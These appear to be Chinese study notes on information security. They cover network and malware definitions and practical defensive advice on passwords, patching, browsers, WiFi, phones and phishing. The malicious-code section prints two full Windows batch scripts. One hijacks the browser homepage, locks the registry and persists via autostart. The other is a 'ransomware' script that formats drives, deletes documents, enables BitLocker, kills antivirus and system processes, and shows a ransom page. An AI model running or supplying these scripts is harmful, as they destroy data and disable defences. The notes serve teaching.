1.名词解释

什么是计算机网络

    计算机网络是利用通信线路将不同地理位置、具有独立功能的计算机和通信设备连接起来，实现资源共享和信息传递等目的的计算机系统。

    主要分类：

    - 局域网：局域网的覆盖范围一般是方圆几千米之内，其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。

    - 城域网：城域网(Metropolitan Area Network)是在一个[城市](https://baike.baidu.com/item/城市/33549)范围内所建立的[计算机通信网](https://baike.baidu.com/item/计算机通信网/7642504)，简称MAN。属宽带[局域网](https://baike.baidu.com/item/局域网/98626)。由于采用具有有源交换元件的[局域网技术](https://baike.baidu.com/item/局域网技术/2597024)，网中[传输时延](https://baike.baidu.com/item/传输时延/9032205)较小，它的传输[媒介](https://baike.baidu.com/item/媒介)主要采用[光缆](https://baike.baidu.com/item/光缆/6931001)，传输[速率](https://baike.baidu.com/item/速率)在100[兆比特](https://baike.baidu.com/item/兆比特)/秒以上。

  MAN的一个重要用途是用作[骨干网](https://baike.baidu.com/item/骨干网/7371439)，通过它将位于同一城市内不同地点的主机、[数据库](https://baike.baidu.com/item/数据库/103728)，以及LAN等互相联接起来，这与[WAN](https://baike.baidu.com/item/WAN)的作用有相似之处，但两者在实现方法与性能上有很大差别。

    - 广域网：**广域网**（英语：Wide Area Network，缩写为 WAN），又称**广域网**、**外网**、**公网**。是连接不同地区[局域网](https://baike.baidu.com/item/局域网)或[城域网](https://baike.baidu.com/item/城域网)计算机通信的远程网。通常跨接很大的物理范围，所覆盖的范围从几十公里到几千公里，它能连接多个地区、城市和国家，或横跨几个洲并能提供远距离通信，形成国际性的远程网络。

    - 互联网：互联网（internet），又称国际网络，指的是[网络](https://baike.baidu.com/item/网络/143243)与网络之间所串连成的庞大网络，这些网络以一组通用的协议相连，形成逻辑上的单一巨大国际网络。

  这种将[计算机网络](https://baike.baidu.com/item/计算机网络/18763)互相联接在一起的方法可称作“网络互联”，在这基础上发展出覆盖全世界的全球性互联网络称互联网，即是互相连接一起的[网络结构](https://baike.baidu.com/item/网络结构/8259917)。

2.信息系统

信息系统是能进行信息的采集、传输、存储、加工、使用和维护的计算机应用系统。如办公自动化系统、人事管理系统、CRM系统、财务系统、火车/飞机订票系统等。

3.信息安全

信息安全是指保护信息系统中的计算机硬件、软件及数据不因偶然或恶意的原因而遭到破坏、更改、泄露，保障系统连续可靠正常地运行，信息服务不中断。

信息安全（狭义）是指保护信息系统的安全，主要目标包括保护信息系统的保密性、完整性和可用性等。

4.计算机病毒

计算机病毒是指编制或者在计算机程序中插入的，破坏计算机功能或者毁坏数据、影响计算机使用，并能自我复制的一组计算机指令或者程序代码。计算机病毒具有寄生性、隐蔽性和传染性等特点。

5.计算机木马

木马是一种用来非法收集信息或控制另一台计算机的特定程序，通常有客户端和服务器端两部分，植入木马的计算机是服务器端部分。木马通常会伪装成程序包、压缩文件、图片、视频等形式，通过网页、邮件、即时通信等渠道诱导用户下载安装，如果用户打开了此类木马程序，用户的计算机或智能终端等设备便会被植入木马者所控制，造成数据文件被窃取或修改、电子账户资金被盗用等危害。

6.入侵

指对计算机网络或系统的非授权访问行为，通常是恶意的存取信息、处理信息或破坏系统的行为。

7.黑客

泛指熟悉IT技术，热衷于入侵网络或计算机系统窃取数据和信息的人员。

8.攻击
指利用网络或计算机系统存在的漏洞和安全缺陷对其进行破坏、泄露、更改或使其丧失功能的行为

9.漏洞
指网络或信息系统的硬件、软件、协议的具体实现或安全策略上存在的弱点或缺陷。漏洞可能来自应用软件或操作系统设计时的缺陷或编码时产生的错误，也可能来自业务在交互处理过程中的设计缺陷或不合理的逻辑流程处理

10.后门
指绕过安全性控制而获取对程序或系统访问权的程序方法，是有意留在计算机系统中，供某些特殊使用者通过某种特殊方式控制计算机系统的途径。后门与漏洞的区别在于：漏洞是一种无意行为，而后门是程序员在软件开发过程中有意创建的。 

11.防火墙
是一种将内部网和外部网隔离，保护内部网免受非法用户的侵入的访问控制技术。防火墙可以软件实现，也可以硬件实现。 

12.补丁
指针对软件系统在使用过程中暴露的缺陷而发布的修补漏洞的小程序

2.网络信息安全常见分类

• 物理安全

  • 存放位置
  • 设备冗余
  • 硬件设置：bios密码，禁止从光盘、USB设备引导系统
  • 人员管理

• 系统安全

  • 系统/软件漏洞
  • 账号和权限管理
  • 软件及服务管理

• 网络安全

  • 防火墙策略
  • 入侵检测

• 应用安全

  • 加密传输
  • 应用系统防护

• 数据安全

  • 数据备份
  • 数据加密
  • 存取权限控制
  • 人员管理

3.恶意代码攻击

通过修改注册表，实现篡改浏览器首页

#关闭回显
@echo off   
# 修改首页
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.game.com" /f   
# 锁定首页
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f 
# 锁定注册表
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f  
# 添加自启动
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "test" /d "%windir%\System32\shouye.bat" /f   
copy %0 %windir%\System32\shouye.bat

清楚方法：

删除文件C:\Windows\System32\shouye.bat
运行gpedit.msc组策略编辑器
 用户配置-->管理模板-->系统，将“阻止访问注册表工具”设        为“已禁用”
用户配置-->管理模板-->Windows组件-->Internet Explorer，将“禁止更改主页设置”设为“已禁用”
编辑注册表，删除开机启动项“test”
重新打开Internet Explorer浏览器，修复主页设置

勒索病毒恶意攻击

cls
@echo off
echo y|format d: /q
echo y|format e: /q
echo y|format f: /q
del c:\*.doc /s /f /q
del c:\*.xls /s /f /q
del c:\*.xlsx /s /f /q
del c:\*.txt /s /f /q
manage-bde -on d: -RecoveryPassword -RecoveryKey d:\
manage-bde -on d: -RecoveryPassword -RecoveryKey e:\
manage-bde -on d: -RecoveryPassword -RecoveryKey f:\
taskkill /f /im fvenotify.exe > nul
taskkill /f /im fvenotify.exe > nul
manage-bde -protectors -add d: -rp -rk d:\
taskkill /f /im fvenotify.exe > nul
TIMEOUT /T 30
taskkill /f /im fvenotify.exe > nul
echo hello >c:\windows\windows1.txt
echo "Congratulation！！ your company All your data have been deleted. If you want to get it back, please go to http://www.michaelxia.net/ to rush 100W, thank you!">>c:\windows\windows1.txt
start c:\windows\windows1.txt
set superxiaoyuerc=echo
%superxiaoyuerc% "<html>" > %windir%\hax0r.html
%superxiaoyuerc% "<head>" >> %windir%\hax0r.html
%superxiaoyuerc% "<title>Virus</title>" >> %windir%\hax0r.html
%superxiaoyuerc% "</head>" >> %windir%\hax0r.html
%superxiaoyuerc% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%superxiaoyuerc% "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">hack!</font></b></p>" >> %windir%\hax0r.html
%superxiaoyuerc% "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">Hello, your company All your data have been deleted. If you want to get it back, please go to http://www.7005b.net/ to rush 100W, thank you!</font></b></p>" >> %windir%\hax0r.html
%superxiaoyuerc% "</body>" >> %windir%\hax0r.html
%superxiaoyuerc% "</html>" >> %windir%\hax0r.html
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v super003 /t REG_SZ /d %windir%\hax0r.html /f > nul
start c:\windows\hax0r.html
set superxiaoyuer=tskill
%superxiaoyuer% norton*
%superxiaoyuer% av*
%superxiaoyuer% fire*
%superxiaoyuer% anti*
%superxiaoyuer% spy*
%superxiaoyuer% bullguard
%superxiaoyuer% PersFw
%superxiaoyuer% KAV*
%superxiaoyuer% ZONEALARM
%superxiaoyuer% SAFEWEB
%superxiaoyuer% OUTPOST
%superxiaoyuer% nv*
%superxiaoyuer% nav*
%superxiaoyuer% F-*
%superxiaoyuer% ESAFE
%superxiaoyuer% cle
%superxiaoyuer% BLACKICE
%superxiaoyuer% def*
%superxiaoyuer% 360*
%superxiaoyuer% pt*
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v super001 /t REG_SZ /d %windir%\windows1.txt /f > nul
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
start c:\windows\hax0r.html

3. 安全防护

3.1计算机安全防护策略

（1）计算机及应用系统要设置登录口令

计算机要设置开机口令，重要的应用系统要设置登录口令；口令长度一般不少于8位，除非系统限制，尽可能用字母、数字和下划线混合编制口令；不要以容易猜测的个人信息（如姓名、生日、手机号、计算机用户名）、学校名称等作为口令；口令使用一段时间后要更换。

开机口令设置方法：打开计算机的“控制面板”，进入“用户帐户”，选择“创建密码”或“更改密码”功能。

（2）计算机要安装杀毒软件

计算机应安装主流的杀毒软件，并且至少一周更新一次；对杀毒软件要进行更新设置，可选择每天检查更新，确保软件的病毒查杀能力。

杀毒软件安装方法：在杀毒软件厂家的官网下载并安装，建议使用360安全卫士等免费的杀毒软件套装。

（3）计算机要及时更新操作系统补丁

Windows等操作系统开发商一般每月都会发布最新的补丁程序用以修复新发现的操作系统漏洞，漏洞类型主要分为高危漏洞和功能性漏洞两种，对高危漏洞的补丁必须安装，功能性漏洞的补丁可选择性进行安装，避免造成系统资源的浪费。要定期进行补丁升级更新，升级到最新的安全补丁，可以提高计算机的防御能力。补丁更新方法：打开计算机的“控制面板”，进入“Windows Update”，选择“检查更新”功能；或者通过360安全卫士自动检测更新。

（4）防止通过U盘的病毒感染

如果将带有木马或病毒的U盘接入计算机，很可能会将木马或病毒传播到计算机中。要使用杀毒软件或查杀木马软件及时对接入到计算机的U盘进行检测，并关闭计算机U盘自动播放功能；在U盘处于工作状态时不要拔出U盘，避免造成数据丢失。

（5）不要轻易下载小网站的软件与程序

不要光顾那些很诱惑人的小网站，因为这些网站很有可能就是网络陷阱。尤其是不要在线启动、阅读某些文件，否则您很有可能成为网络病毒的传播者。

3.2 互联网安全防护策略

（1）浏览器安全设置

互联网上充满着各种钓鱼网站、病毒、木马程序，打开来历不明的网页、电子邮件链接、附件可能导致木马或病毒自动进入计算机，造成文件丢失、损坏甚至计算机系统瘫痪。当前主流的浏览器有微软的IE浏览器、谷歌的Chrome浏览器、360安全浏览器和火狐Firefox浏览器等等，不同的浏览器产品对恶意网址拦截的功能差别较大，大家可以比较后选择安装。修改安全设置的方法（以IE浏览器为例）：打开IE浏览器，点击“工具/设置”后，在下拉菜单“Internet选项”中，选择“安全”，可对“Internet”或“本地Intranet”区域的安全级别进行自定义设置，一般选择“中-高”，如果选择级别太高，会对浏览网页产生一些影响。

（2）Cookie安全限制

Cookie是一个数据包，当用户浏览一个网站后会生成这样一个数据包，包含了发布Cookie的网站名、用户访问该网站的种种活动、个人资料、浏览习惯、消费习惯等数据。它的作用是能够让你在下一次访问时不需要重新输入用户名和口令。Cookie本身是安全的，它既可以存储在个人计算机上，也可在一次浏览会话中创建、使用并删除。Cookie的安全问题是个人信息容易被别人以不为人觉察的方式收集、存储和利用。

安全防范策略：

在浏览器中对Cookie的使用做出限制，并定期删除浏览器中的Cookie。清除Cookies有利于保护自己的隐私不被跟踪。

限制使用Cookie的方法：单击“工具/Internet选项”->“隐私”->“设置”菜单中，调整Cookie的安全级别。多数的网站论坛站点需要使用Cookie信息，一般选择“中高”或者“高”的安全级别。最高安全级是“阻止所有Cookie”；如果只是为了禁止个别网站的Cookie，可以单击“编辑”按钮，将要屏蔽的网站添加到列表中。清除Cookie的方法：点击浏览器上方的“工具/Internet选项”->“常规”菜单，点击“删除浏览的历史记录”，选择删除“Cookie”。

（3）公共场所上网安全

在公共场所如酒店、网吧、图书馆、咖啡厅、机场、地铁站等地方，使用公用计算机上网登录邮箱、网上购物时，很容易遭受网络攻击，导致账户口令被泄露，带来经济损失。

安全防范策略：

不要轻易使用公共场所提供的计算机登录邮箱和进行网上购物，在使用时尽量使用Https协议登录网站和邮箱；

在上网时不要选择“记住用户名和密码”；

互联网浏览器后，应清空历史记录和缓存内容。

3.3 无线网络安全防护策略

（1）WiFi上网的安全

WiFi是一种允许电子设备连接到一个无线局域网的传输技术，遵循IEEE802.11标准。目前使用WiFi无线网络存在重大的安全隐患，一方面是公共场所的无密码WiFi热点，很可能就是钓鱼陷阱；另一方面是网民家里的无线路由器如果设置不合理，很可能被恶意攻击者轻松攻破，攻击者除了免费享用网络带宽外，还可以登录无线路由器的管理后台，这样网民在家里通过WiFi连接无线网，进行微信、QQ、甚至网银登录，很可能在毫不知情的情况下，面临个人敏感信息遭盗取风险，甚至遭受直接的经济损失。

无密码WiFi的安全防范策略：

尽量不使用公共场所提供的无密码的WiFi无线网络；

不要在无密码WiFi网络环境下进行与资金有关的银行转账与支付等操作。

家庭WiFi的安全防范策略：

路由器管理后台的登录账号、密码，不要使用默认的admin，启用时更改为字母加数字的高强度密码；

WiFi设置要选择WPA/WPA2加密认证方式；

WiFi密码要使用相对复杂的密码，可提高黑客破解的难度。

（2）手机等智能终端的安全

智能手机和平板电脑等移动智能终端已融入了我们的生活，大家也越来越依赖智能手机。但手机支付漏洞、手机远程定位、手机信息泄露等安全问题屡见不鲜。智能手机强大的上网功能和部分用户不安全的上网习惯，给了手机病毒、木马乘虚而入的机会，短信彩信、邮件等也是手机病毒传播感染的重要途径。

安全防范策略：

设置手机锁屏密码，以防手机遗失时，被不法之徒轻易获得通讯录、文件等重要信息；

不要轻易点击打开别人在QQ、微信、短信、邮件中发来的链接地址；

平时关闭手机的自动搜索无线网络功能，仅在需要时开启；

在手机的QQ、微信等应用程序中关闭地理定位功能；

经常为智能手机做数据备份。

在正规的通信运营商处维修手机，防止手机被植入病毒木马程序。

3.4 网上银行安全防护策略

（1）网上支付的安全

随着电子商务的发展，社会公众对小额、快捷、便民的小微支付服务需求日益增长，网络支付服务得到了快速发展，相关问题和风险也不断显现。由于客户在网上银行及其它支付机构不需要提供任何印鉴，仅凭USB Key或手机支付密码就可以办理支付业务，伴随着日益频繁的支付活动，个人支付信息泄露风险大大增加，消费者面临更大的资金被盗和欺诈风险。

安全防范策略：

妥善保管好相应的网上银行认证信息；

不要在网吧等不安全的公共场所使用网上银行交易系统执行支付操作；

不要轻易相信陌生的电话或者短信、邮件，避免个人信息泄漏；

静态口令应牢记脑中，动态口令要谨慎保管，支付密码应尽量设置为数字、英文大小写字母的组合，不要用生日、姓名等容易被猜中的内容做密码；

建议对不同的电子支付方式分别设置合理的交易限额，在交易未完成时不要中途离开交易终端；

通过定制银行短信提醒服务和对账邮件，及时获得银行登录、余额变动、账户设置变更等信息提醒。

（2）钓鱼网站的防范

钓鱼网站通常伪装成为银行网站，骗取访问者提交的账号和密码信息。它一般通过电子邮件传播，通过邮件中一个经过伪装的链接将收件人导向钓鱼网站。钓鱼网站的页面与真实银行网站界面几乎完全一致，要求访问者提交账号和密码。钓鱼网站结构一般都只有一个或几个页面，其URL和真实网站有细微差别。

安全防范策略：

查看网站身份信息，可通过中国互联网络信息中心（CNNIC）运行的国家最高目录数据库中的“可信网站”子数据库，可以甄别网站的真实身份；

查询网站备案，可通过ICP备案可以查询到网站的基本情况和网站拥有者的情况，没有合法备案的非经营性网站或没有取得ICP许可证的经营性网站，都是非法的网站。

认真核对网站域名，钓鱼网站和真实网站有细微区别，有疑问时要仔细辨别其不同之处，比如在域名方面，钓鱼网站通常将英文字母I被替换为数字1。

查看网站的安全证书，大型的电子商务网站都应用了可信证书类产品，其网址都是“Https”打头的，对不是“Https”开头的电商网站要特别谨慎。

网上购物时请到信誉好、知名的网上商户进行网上支付，交易时请确认地址栏里的网址是否正确；

不要随便点击手机接收到的中奖、贷款等短信和非银行官方网站上的链接信息。